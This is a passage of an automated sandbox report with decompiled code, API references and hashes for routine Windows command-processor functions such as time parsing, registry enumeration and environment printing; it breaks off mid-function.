Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID:
String ID: GeToken: (%x) '%s'$Ungetting: '%s'
API String ID: 0-1704545398
Opcode ID: d97d61f2de23ae52eccedb37046713464a36cd369fbe448f548ec5dcfe6d0773
Instruction ID: 3769bda6fa6b20a96f373552531979d53ef45bb90616f0a79c87bd565b3a4075
Opcode Fuzzy Hash: d97d61f2de23ae52eccedb37046713464a36cd369fbe448f548ec5dcfe6d0773
Instruction Fuzzy Hash: D4510531A00100DAD718BFACDD557FA72A6EBB4314F55847EE8069B6A1DB71CC87C391

Uniqueness

Uniqueness Score: -1.00%

Function 001D4159 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E001D4159(signed int __ecx, wchar_t* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t26;
				long _t29;
				void* _t30;
				void* _t32;
				int _t36;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				signed short _t42;
				long _t45;
				long _t46;
				signed int _t48;
				wchar_t* _t52;
				int _t55;
				signed int _t59;
				void* _t64;
				long* _t66;
				intOrPtr _t69;
				long* _t73;
				void* _t77;
				void* _t78;
				void* _t79;
				wchar_t* _t81;
				signed int _t83;
				signed int _t84;
				void* _t85;

				_t26 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t26 ^ _t84;
				_v32 = __ecx;
				_v28 = _a4;
				_t52 = __edx;
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_t55 = 0;
				_v24 = __ecx + 8;
				_t77 = 0;
				while(1) {
					_t81 = _t52;
					_t8 =  &(_t81[0]); // 0x2
					_t73 = _t8;
					do {
						_t29 =  *_t81;
						_t81 =  &(_t81[0]);
					} while (_t29 != _t55);
					_t83 = _t81 - _t73 >> 1;
					if(_t83 > 2 || iswdigit( *_t52 & 0x0000ffff) == 0) {
						L16:
						_t74 =  *_t52 & 0x0000ffff;
						if(( *_t52 & 0x0000ffff) == 0) {
							goto L31;
						} else {
							if(E001BD7D4( &_v20, _t74) == 0) {
								goto L11;
							} else {
								goto L18;
							}
						}
					} else {
						_t45 = _t52[0] & 0x0000ffff;
						if(_t45 == 0 || iswdigit(_t45) != 0) {
							_t46 = wcstol(_t52, 0, 0xa);
							_t66 = _v24;
							_t52 = _t52 + _t83 * 2 + 2;
							_t85 = _t85 + 0xc;
							 *_t66 = _t46;
							_t74 =  *_t52 & 0x0000ffff;
							_v24 =  &(_t66[0]);
							if(( *_t52 & 0x0000ffff) == 0) {
								L31:
								_t77 = _t77 + 1;
								_t30 = 4;
								if(_t77 < _t30) {
									_t78 = _v24;
									_t59 = _t30 - _t77 >> 1;
									_t36 = memset(_t78, 0, _t59 << 2);
									_t79 = _t78 + _t59;
									asm("adc ecx, ecx");
									memset(_t79, _t36, 0);
									_t77 = _t79;
								}
								_t32 = 1;
							} else {
								if(E001BD7D4( &_v20, _t74) != 0) {
									L18:
									_t39 =  *_t52 & 0x0000ffff;
									if(_t39 == 0x70 || _t39 == 0x50) {
										_t64 = 1;
									} else {
										_t64 = 0;
									}
									_t40 = _t52[1] & 0x0000ffff;
									if(_t40 == 0 || _t40 == 0x6d || _t40 == 0x4d) {
										_t74 = _v32;
										_t41 =  *(_t74 + 8) & 0x0000ffff;
										if(_t64 == 0) {
											if(_t41 == 0xc) {
												_t42 = 0;
												goto L30;
											}
										} else {
											if(_t41 != 0xc) {
												_t42 = _t41 + 0xc;
												L30:
												 *(_t74 + 8) = _t42;
											}
										}
										goto L31;
									} else {
										goto L11;
									}
								} else {
									_t48 =  *_t52 & 0x0000ffff;
									_t69 = _v28;
									if(_t77 >= 2) {
										if(_t48 ==  *((intOrPtr*)(_t69 + 2)) || _t48 ==  *((intOrPtr*)(_t69 + 6))) {
											goto L14;
										} else {
											goto L11;
										}
									} else {
										_t74 = _t48;
										if(E001BD7D4(_t69, _t48) != 0) {
											L14:
											_t77 = _t77 + 1;
											_t52 = E001BD7E6(_t52);
											if(_t77 >= 4) {
												goto L16;
											} else {
												_t55 = 0;
												continue;
											}
										} else {
											L11:
											_t32 = 0;
										}
									}
								}
							}
						} else {
							goto L16;
						}
					}
					return E001C6FD0(_t32, _t52, _v8 ^ _t84, _t74, _t77, _t83);
				}
			}

0x001d4161
0x001d4168
0x001d4176
0x001d417c
0x001d417f
0x001d4181
0x001d4182
0x001d4183
0x001d4188
0x001d418a
0x001d418d
0x001d418f
0x001d418f
0x001d4191
0x001d4191
0x001d4194
0x001d4194
0x001d4197
0x001d419a
0x001d41a1
0x001d41a6
0x001d424b
0x001d424b
0x001d4251
0x00000000
0x001d4253
0x001d425d
0x00000000
0x00000000
0x00000000
0x00000000
0x001d425d
0x001d41bf
0x001d41bf
0x001d41c6
0x001d41d9
0x001d41df
0x001d41e5
0x001d41e8
0x001d41eb
0x001d41f1
0x001d41f4
0x001d41fa
0x001d42a6
0x001d42a8
0x001d42a9
0x001d42ac
0x001d42b0
0x001d42b7
0x001d42b9
0x001d42b9
0x001d42bb
0x001d42bd
0x001d42bd
0x001d42bd
0x001d42c2
0x001d4200
0x001d420a
0x001d425f
0x001d425f
0x001d4265
0x001d4272
0x001d426c
0x001d426c
0x001d426c
0x001d4273
0x001d427a
0x001d4286
0x001d4289
0x001d428f
0x001d429e
0x001d42a0
0x00000000
0x001d42a0
0x001d4291
0x001d4294
0x001d4296
0x001d42a2
0x001d42a2
0x001d42a2
0x001d4294
0x00000000
0x00000000
0x00000000
0x00000000
0x001d420c
0x001d420c
0x001d420f
0x001d4215
0x001d422d
0x00000000
0x00000000
0x00000000
0x00000000
0x001d4217
0x001d4217
0x001d4220
0x001d4235
0x001d4237
0x001d423d
0x001d4242
0x00000000
0x001d4244
0x001d4244
0x00000000
0x001d4244
0x001d4222
0x001d4222
0x001d4222
0x001d4222
0x001d4220
0x001d4215
0x001d420a
0x00000000
0x00000000
0x00000000
0x001d41c6
0x001d42d3
0x001d42d3

APIs

iswdigit.MSVCRT ref: 001D41B0
iswdigit.MSVCRT ref: 001D41C9
wcstol.MSVCRT ref: 001D41D9

Strings

aApP, xrefs: 001D4171

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: iswdigit$wcstol
String ID: aApP
API String ID: 644763121-2547155087
Opcode ID: 17b7f8892b3619978d72ba622bf4ac6d5f52429c3433a5930054f2c1a4a34be7
Instruction ID: 50f9690d35200485935106404af4fe4a0899fce113c192286dbf67e5a9f3a470
Opcode Fuzzy Hash: 17b7f8892b3619978d72ba622bf4ac6d5f52429c3433a5930054f2c1a4a34be7
Instruction Fuzzy Hash: 9941B375A0011287CF28DF69E8856BFB3B5AF65301759442BFD46DB784EB30DD82C251

Uniqueness

Uniqueness Score: -1.00%

Function 001D4B4E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139
registryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E001D4B4E(void* __ecx, signed int __edx) {
				signed int _v8;
				short _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				void* _t24;
				signed int _t26;
				signed int _t31;
				void* _t39;
				void* _t42;
				int _t43;
				signed int _t53;
				signed int _t54;
				int _t59;
				void* _t64;
				int* _t66;
				void* _t67;
				void* _t69;
				signed int _t70;
				void* _t71;
				void* _t80;

				_t63 = __edx;
				_t19 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t19 ^ _t70;
				_t67 = __ecx;
				_v532 = __ecx;
				if(__edx != 0) {
					_t43 = E001BDF40(E001BDEF9(__edx));
					__eflags = _t43;
					if(_t43 == 0) {
						L14:
						_t24 = 1;
						L28:
						__eflags = _v8 ^ _t70;
						return E001C6FD0(_t24, _t43, _v8 ^ _t70, _t63, _t66, _t67);
					}
					_t64 = 0x20;
					_t26 = E001C2349(_t43, _t64);
					__eflags = _t26;
					if(__eflags != 0) {
						__eflags = 0;
						 *_t26 = 0;
					}
					_t50 = _t67;
					_t63 = E001D5662(_t43, _t67, _t43, _t66, _t67, __eflags);
					_v532 = _t63;
					__eflags = _t63;
					if(_t63 == 0) {
						L25:
						_t67 = 1;
						__eflags = 1;
						E001BC5A2(_t50, 0x400023a3, 1, _t43);
						goto L26;
					} else {
						_t53 = _t63;
						_t66 = 0;
						__eflags = 0;
						_t16 = _t53 + 2; // 0x2
						_t69 = _t16;
						do {
							_t31 =  *_t53;
							_t53 = _t53 + 2;
							__eflags = _t31;
						} while (_t31 != 0);
						_t54 = _t53 - _t69;
						__eflags = _t54;
						_t50 = _t54 >> 1;
						if(_t54 == 0) {
							goto L25;
						}
						_push(_t63);
						_push(_t43);
						_t67 = E001C25D9(L"%s=%s\r\n");
						L26:
						E001C0040(_v532);
						E001C0040(_t43);
						L27:
						_t24 = _t67;
						goto L28;
					}
				}
				_t66 = 0;
				_t43 = 0;
				_v536 = 0;
				while(1) {
					_v540 = 0x104;
					_t67 = RegEnumKeyExW(_t67, _t43,  &_v528,  &_v540, _t66, _t66, _t66, _t66);
					if(_t67 != 0) {
						break;
					}
					_t76 = _v528 - 0x2e;
					if(_v528 != 0x2e) {
						L10:
						_t80 =  *0x1dd544 - _t66; // 0x0
						if(_t80 != 0) {
							goto L14;
						}
						_t43 = _t43 + 1;
						_v536 = _t43;
						if(_t67 != 0) {
							goto L27;
						}
						_t67 = _v532;
						continue;
					}
					_t56 = _v532;
					_t63 =  &_v528;
					_t43 = E001D5662(_t43, _v532,  &_v528, _t66, _t67, _t76);
					if(_t43 == 0) {
						_push(_t66);
						_push(GetLastError());
						E001BC5A2(_t56);
						goto L14;
					}
					_t59 = _t43;
					_t10 = _t59 + 2; // 0x2
					_t63 = _t10;
					do {
						_t39 =  *_t59;
						_t59 = _t59 + 2;
					} while (_t39 != _t66);
					if(_t59 != _t63) {
						_push(_t43);
						_push( &_v528);
						_t42 = E001C25D9(L"%s=%s\r\n");
						_t71 = _t71 + 0xc;
						_t67 = _t42;
					}
					E001C0040(_t43);
					_t43 = _v536;
					goto L10;
				}
				__eflags = _t67 - 0x103;
				if(_t67 == 0x103) {
					_t67 = _t66;
				}
				goto L27;
			}

0x001d4b4e
0x001d4b59
0x001d4b60
0x001d4b65
0x001d4b67
0x001d4b70
0x001d4c63
0x001d4c65
0x001d4c67
0x001d4c3a
0x001d4c3c
0x001d4cdf
0x001d4ce4
0x001d4cef
0x001d4cef
0x001d4c6b
0x001d4c6e
0x001d4c73
0x001d4c75
0x001d4c77
0x001d4c79
0x001d4c79
0x001d4c7e
0x001d4c85
0x001d4c87
0x001d4c8d
0x001d4c8f
0x001d4cb9
0x001d4cbc
0x001d4cbc
0x001d4cc3
0x00000000
0x001d4c91
0x001d4c91
0x001d4c93
0x001d4c93
0x001d4c95
0x001d4c95
0x001d4c98
0x001d4c98
0x001d4c9b
0x001d4c9e
0x001d4c9e
0x001d4ca3
0x001d4ca3
0x001d4ca5
0x001d4ca7
0x00000000
0x00000000
0x001d4ca9
0x001d4caa
0x001d4cb5
0x001d4cc8
0x001d4cd1
0x001d4cd8
0x001d4cdd
0x001d4cdd
0x00000000
0x001d4cdd
0x001d4c8f
0x001d4b76
0x001d4b78
0x001d4b7a
0x001d4b80
0x001d4b8a
0x001d4ba4
0x001d4ba8
0x00000000
0x00000000
0x001d4bae
0x001d4bb6
0x001d4c09
0x001d4c09
0x001d4c0f
0x00000000
0x00000000
0x001d4c11
0x001d4c12
0x001d4c1a
0x00000000
0x00000000
0x001d4c20
0x00000000
0x001d4c20
0x001d4bb8
0x001d4bbe
0x001d4bc9
0x001d4bcd
0x001d4c2b
0x001d4c32
0x001d4c33
0x00000000
0x001d4c39
0x001d4bcf
0x001d4bd1
0x001d4bd1
0x001d4bd4
0x001d4bd4
0x001d4bd7
0x001d4bda
0x001d4be3
0x001d4be5
0x001d4bec
0x001d4bf2
0x001d4bf7
0x001d4bfa
0x001d4bfa
0x001d4bfe
0x001d4c03
0x00000000
0x001d4c03
0x001d4c42
0x001d4c48
0x001d4c4e
0x001d4c4e
0x00000000

APIs

RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 001D4B9E
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 001D4C2C

Strings

., xrefs: 001D4BAE
%s=%s, xrefs: 001D4BED, 001D4CAB

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: EnumErrorLast
String ID: %s=%s$.
API String ID: 1967352920-4275322459
Opcode ID: 9099a3d5cc265ede570f937710753317358b1cf382d3e37bdb8804d3ea44ddd2
Instruction ID: 7eca78d62f34d4eaceaec7bf37583955a01571afe5cc01da77c925b05bcb9793
Opcode Fuzzy Hash: 9099a3d5cc265ede570f937710753317358b1cf382d3e37bdb8804d3ea44ddd2
Instruction Fuzzy Hash: 59413671F0121997CB34AB699C95BFB73A9EBE4300F1541AFF81A97341EF708E418A90

Uniqueness

Uniqueness Score: -1.00%

Function 001C62FA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 001C6367
_wcsnicmp.MSVCRT ref: 001CF6F6

Strings

/-Y, xrefs: 001CF6F0
COPYCMD, xrefs: 001C6314

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: _wcsnicmp
String ID: /-Y$COPYCMD
API String ID: 1886669725-617350906
Opcode ID: 345a157a0afa60d70e4132a8b5f1d76c24944c11b83f2cc85fdf51ec4ebab245
Instruction ID: 3972d7c3a5eececbedd8a67d1e5710f25261019f43ac473e95388a047d408bad
Opcode Fuzzy Hash: 345a157a0afa60d70e4132a8b5f1d76c24944c11b83f2cc85fdf51ec4ebab245
Instruction Fuzzy Hash: 9F216B71A0025197CB289B5A8C45FBAB6F6FFA4350B61106EF84D97240EB70CD02C150

Uniqueness

Uniqueness Score: -1.00%

Function 001DAB79 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E001DAB79(void* __ecx, char* __edx, signed char* _a4) {
				signed int _v8;
				int _v20;
				char _v24;
				signed int _v28;
				void _v548;
				char* _v552;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t25;
				void* _t39;
				char _t42;
				void* _t44;
				intOrPtr _t47;
				void* _t59;
				signed int _t61;

				_t58 = __edx;
				_t25 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t25 ^ _t61;
				_v28 = _v28 & 0x00000000;
				_t60 = 0x104;
				_v552 = __edx;
				_v20 = 0x104;
				_t46 = 1;
				_t59 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E001C0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t37 = _a4;
					_t60 = L"%s";
					if(( *_a4 & 0x00000010) != 0) {
						_t60 = L"[%s]";
					}
					_t39 = E001C0D89(_t58, _t37 + 0x2c);
					_t54 = _v28;
					if(_v28 == 0) {
						_t54 =  &_v548;
					}
					_t47 = _v552;
					E001C6810(_t39, _t54, _t47);
					if(_t47 < 0) {
						_t44 = _v28;
						if(_t44 == 0) {
							_t44 =  &_v548;
						}
						__imp___wcslwr(_t44);
					}
					_t41 = _v28;
					if(_v28 == 0) {
						_t41 =  &_v548;
					}
					_t58 = _t60;
					_t42 = E001C6B76(_t59, _t60, _t41);
					_t46 = _t42;
					if(_t42 == 0) {
						_t46 = E001D7D7D(_t59);
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E001C6FD0(_t46, _t46, _v8 ^ _t61, _t58, _t59, _t60, _v28);
			}

0x001dab79
0x001dab84
0x001dab8b
0x001dab8e
0x001dab9b
0x001daba0
0x001daba9
0x001dabae
0x001dabaf
0x001dabb2
0x001dabb5
0x001dabdb
0x001dabdd
0x001dabe0
0x001dabe8
0x001dabea
0x001dabea
0x001dabf9
0x001dabfe
0x001dac03
0x001dac05
0x001dac05
0x001dac0b
0x001dac12
0x001dac19
0x001dac1b
0x001dac20
0x001dac22
0x001dac22
0x001dac29
0x001dac2f
0x001dac30
0x001dac35
0x001dac37
0x001dac37
0x001dac3e
0x001dac42
0x001dac47
0x001dac4b
0x001dac54
0x001dac54
0x001dac4b
0x001dac59
0x001dac72

APIs

memset.MSVCRT ref: 001DABB5

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

_wcslwr.MSVCRT ref: 001DAC29
??_V@YAXPAX@Z.MSVCRT ref: 001DAC59

Strings

[%s], xrefs: 001DABEA

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset$_wcslwr
String ID: [%s]
API String ID: 886762496-302437576
Opcode ID: 2f005a8f4181abcc5540a6b6b942f1d8f7e78303cae36cf0c4b5e8a1aa7a5210
Instruction ID: 1f76485d401892a6e98804b2bb4bf348ac3932e2e454cafe111620e3dd93163e
Opcode Fuzzy Hash: 2f005a8f4181abcc5540a6b6b942f1d8f7e78303cae36cf0c4b5e8a1aa7a5210
Instruction Fuzzy Hash: 52217371A012199BDB14DBE4DDC5BFEBBA8AF68314F4800AAE509D3241EB74DE44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001C23A9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 001C2430: iswspace.MSVCRT ref: 001C2440

iswspace.MSVCRT ref: 001C23C8
_wcsnicmp.MSVCRT ref: 001C2419

Strings

off, xrefs: 001C2413

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: iswspace$_wcsnicmp
String ID: off
API String ID: 3989682491-733764931
Opcode ID: 13a9120051d4db5aa882d76b51433c3890fd76f0f75bbaf204df66417b5ee96f
Instruction ID: be409b06164386f862e900b92dd63fcf83f80ff79b156b9705f22cff2b6f858a
Opcode Fuzzy Hash: 13a9120051d4db5aa882d76b51433c3890fd76f0f75bbaf204df66417b5ee96f
Instruction Fuzzy Hash: 3C11083270029297DA2D223E6C47F3E1254ABB9B56B26102EFC46E60C1EF39CD41D161

Uniqueness

Uniqueness Score: -1.00%

Function 001D4506 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E001D4506(intOrPtr* __ecx) {
				void* _t5;
				signed int _t6;
				signed int _t8;
				signed int _t9;
				void* _t19;
				signed int _t23;
				intOrPtr* _t26;
				signed int _t27;
				signed int _t28;
				signed int _t30;

				_t23 = __ecx;
				if(__ecx != 0) {
					_t26 = __ecx;
					__eflags = 0;
					_t19 = __ecx + 2;
					do {
						_t6 =  *_t26;
						_t26 = _t26 + 2;
						__eflags = _t6;
					} while (_t6 != 0);
					while(1) {
						_t27 = _t26 - _t19;
						__eflags = _t27;
						_t28 = _t27 >> 1;
						if(_t27 == 0) {
							break;
						}
						__eflags =  *0x1dd544; // 0x0
						if(__eflags != 0) {
							_t8 = 1;
						} else {
							__eflags =  *_t23 - 0x3d;
							if( *_t23 != 0x3d) {
								_push(_t23);
								E001C25D9(L"%s\r\n");
							}
							_t23 = _t23 + _t28 * 2 + 2;
							__eflags = _t23;
							_t30 = _t23;
							_t19 = _t30 + 2;
							do {
								_t9 =  *_t30;
								_t30 = _t30 + 2;
								__eflags = _t9;
							} while (_t9 != 0);
							continue;
						}
						L12:
						return _t8;
						goto L14;
					}
					_t8 = 0;
					__eflags = 0;
					goto L12;
				} else {
					_push("Null environment");
					fprintf(E001C7721(_t5, 2), "\nCMD Internal Error %s\n");
					return 1;
				}
				L14:
			}

0x001d4509
0x001d450d
0x001d4532
0x001d4534
0x001d4536
0x001d4539
0x001d4539
0x001d453c
0x001d453f
0x001d453f
0x001d4577
0x001d4577
0x001d4577
0x001d4579
0x001d457b
0x00000000
0x00000000
0x001d4546
0x001d454c
0x001d4585
0x001d454e
0x001d454e
0x001d4552
0x001d4554
0x001d455a
0x001d4560
0x001d4564
0x001d4564
0x001d4567
0x001d4569
0x001d456c
0x001d456c
0x001d456f
0x001d4572
0x001d4572
0x00000000
0x001d456c
0x001d457f
0x001d4582
0x00000000
0x001d4582
0x001d457d
0x001d457d
0x00000000
0x001d450f
0x001d450f
0x001d4522
0x001d452f
0x001d452f
0x00000000

APIs

Part of subcall function 001C7721: __iob_func.MSVCRT ref: 001C7726

fprintf.MSVCRT ref: 001D4522

Strings

%s, xrefs: 001D4555
CMD Internal Error %s, xrefs: 001D4514
Null environment, xrefs: 001D450F

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: __iob_funcfprintf
String ID: CMD Internal Error %s$%s$Null environment
API String ID: 620453056-2781220306
Opcode ID: e1a8fa75cd3366128ca6038efd25306da4f5f793b10acca88afd64bd2f6c7b3b
Instruction ID: 81543d9915c83d8cb278caade60d897af4bfb5ff4833eb024cdeeee4a4c3ed1f
Opcode Fuzzy Hash: e1a8fa75cd3366128ca6038efd25306da4f5f793b10acca88afd64bd2f6c7b3b
Instruction Fuzzy Hash: C101263BA442119BDB34BB9C784A9B37364DBE03207150A2BEC5A93784FBB09D42C591

Uniqueness

Uniqueness Score: -1.00%

Function 001D2950 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E001D2950(void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int _t3;
				void* _t6;
				struct HINSTANCE__* _t8;
				void* _t10;
				void* _t15;
				void* _t16;
				_Unknown_base(*)()* _t18;
				void* _t19;
				signed int _t20;

				_push(__ecx);
				_t3 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t3 ^ _t20;
				_t18 =  *0x1f80a0;
				if(_t18 != 0) {
					L5:
					 *0x1f94b4();
					_t6 =  *_t18();
				} else {
					_t8 =  *0x1dd530; // 0x0
					if(_t8 == 0) {
						_t8 = GetModuleHandleW(L"ntdll.dll");
						 *0x1dd530 = _t8;
					}
					_t18 = GetProcAddress(_t8, "RtlDllShutdownInProgress");
					 *0x1f80a0 = _t18;
					if(_t18 != 0) {
						goto L5;
					} else {
						_t6 = 0;
					}
				}
				_pop(_t19);
				return E001C6FD0(_t6, _t10, _v8 ^ _t20, _t15, _t16, _t19);
			}

0x001d2955
0x001d2956
0x001d295d
0x001d2961
0x001d2969
0x001d29a0
0x001d29a2
0x001d29a8
0x001d296b
0x001d296b
0x001d2972
0x001d2979
0x001d297f
0x001d297f
0x001d2990
0x001d2992
0x001d299a
0x00000000
0x001d299c
0x001d299c
0x001d299c
0x001d299a
0x001d29af
0x001d29b8

APIs

GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 001D2979
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 001D298A

Strings

ntdll.dll, xrefs: 001D2974
RtlDllShutdownInProgress, xrefs: 001D2984

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RtlDllShutdownInProgress$ntdll.dll
API String ID: 1646373207-582119455
Opcode ID: 330740ac8c3d014b155804716a06a089e9c4c75a713852183b67e073e1d780d1
Instruction ID: fcea718f963077f385e97c0d86d9243177c22e43882cad68b7a5973c93bb6df6
Opcode Fuzzy Hash: 330740ac8c3d014b155804716a06a089e9c4c75a713852183b67e073e1d780d1
Instruction Fuzzy Hash: 08F09031A12329DBCB14AF24BD19B7B77A8EBA4728B41025AFC11D3710DF709D41CAD6

Uniqueness

Uniqueness Score: -1.00%

Function 001B88D8 Relevance: 6.2, APIs: 4, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E001B88D8(void* __ecx) {
				signed int _v8;
				void* _v12;
				int _v20;
				signed int _v24;
				int _v28;
				void* _v32;
				void* _v36;
				void _v548;
				void* _v552;
				void* _v556;
				void* _v560;
				int _v564;
				int _v568;
				int _v572;
				char _v576;
				char _v580;
				int _v584;
				int _v588;
				void* _v592;
				void* _v596;
				void* _v602;
				int _v606;
				int _v610;
				int _v614;
				int _v618;
				int _v622;
				int _v626;
				int _v630;
				int _v634;
				short _v636;
				int _v640;
				int _v644;
				int _v648;
				int _v652;
				signed int _v656;
				char _v660;
				signed int _v664;
				char _v668;
				void* _v676;
				void* _v680;
				void* _v684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t64;
				intOrPtr _t79;
				signed int _t82;
				long _t87;
				long _t91;
				void* _t93;
				void* _t94;
				intOrPtr _t95;
				intOrPtr* _t106;
				signed int _t107;
				void* _t116;
				intOrPtr _t118;
				WCHAR** _t119;
				void* _t123;
				signed int _t125;
				signed int _t127;
				signed int _t128;

				_t127 = (_t125 & 0xfffffff8) - 0x29c;
				_t64 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t64 ^ _t127;
				_v24 = 1;
				_v644 = 0;
				_t93 = __ecx;
				_v636 = 0;
				_v660 = 0;
				_v656 = 0;
				_v652 = 0;
				_v648 = 0;
				_v640 = 0;
				_v634 = 0;
				_v630 = 0;
				_v626 = 0;
				_v622 = 0;
				_v618 = 0;
				_v614 = 0;
				_v610 = 0;
				_v606 = 0;
				asm("stosd");
				_v668 = 0;
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v588 = 0;
				_v584 = 0;
				_v580 = 0;
				_v576 = 0;
				_v572 = 0;
				_v568 = 0;
				_v564 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_t128 = _t127 + 0xc;
				if(E001C0C70( &_v548, 0x7fe9) < 0) {
					L18:
					_t122 = 1;
				} else {
					_t112 =  &_v660;
					_v664 =  *0x1f3cd8;
					_v656 = 6;
					_t122 = 0;
					_v652 = 0;
					_v588 = 0;
					_v568 = 0;
					if(E001B8AD7( &_v660) == 1) {
						goto L18;
					} else {
						_t103 = _v24;
						if(_v24 == 0) {
							_t103 = _t128 + 0x88;
						}
						_t112 =  *((intOrPtr*)(_t128 + 0x298));
						E001C36CB(_t93, _t103,  *((intOrPtr*)(_t128 + 0x298)), 0);
						_t95 = _v588;
						if(_t95 == 0) {
							_push(0);
							goto L30;
						} else {
							_t112 =  &_v580;
							_t118 = _t95;
							do {
								_t106 =  *_t112;
								_v668 = _t106 + 2;
								do {
									_t79 =  *_t106;
									_t106 = _t106 + 2;
								} while (_t79 != _v664);
								_t107 = _t106 - _v668;
								_t103 = _t107 >> 1;
								if(_t107 == 0) {
									_push(0);
